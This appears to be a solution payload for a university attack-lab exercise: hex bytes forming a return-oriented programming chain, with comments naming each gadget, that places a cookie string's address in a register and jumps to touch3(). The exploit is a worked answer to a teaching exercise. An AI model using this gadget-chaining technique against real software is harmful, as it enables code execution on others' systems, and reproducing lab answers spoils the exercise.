00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15
00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15
00 01 02 03 04 05 06 07
ab 19 40 00 00 00 00 00     /* Gadget 1: popq %rax */
20 00 00 00 00 00 00 00     /* Offset to address for cookie(string) */
dd 19 40 00 00 00 00 00     /* Gadget 2: movl %eax,%edx */
34 1a 40 00 00 00 00 00     /* Gadget 3: movl %edx,%ecx */
13 1a 40 00 00 00 00 00     /* Gadget 4: movl %ecx,%esi */
06 1a 40 00 00 00 00 00     /* Gadget 5: movq %rsp,%rax */
c5 19 40 00 00 00 00 00     /* Gadget 6: movq %rax,%rdi */
d6 19 40 00 00 00 00 00     /* Gadget 7: lea (%rdi,%rsi,1),%rax */
c5 19 40 00 00 00 00 00     /* Gadget 8: movq %rax,%rdi */
fa 18 40 00 00 00 00 00     /* Address for touch3() */
35 39 62 39 39 37 66 61 00  /* String representation of cookie */
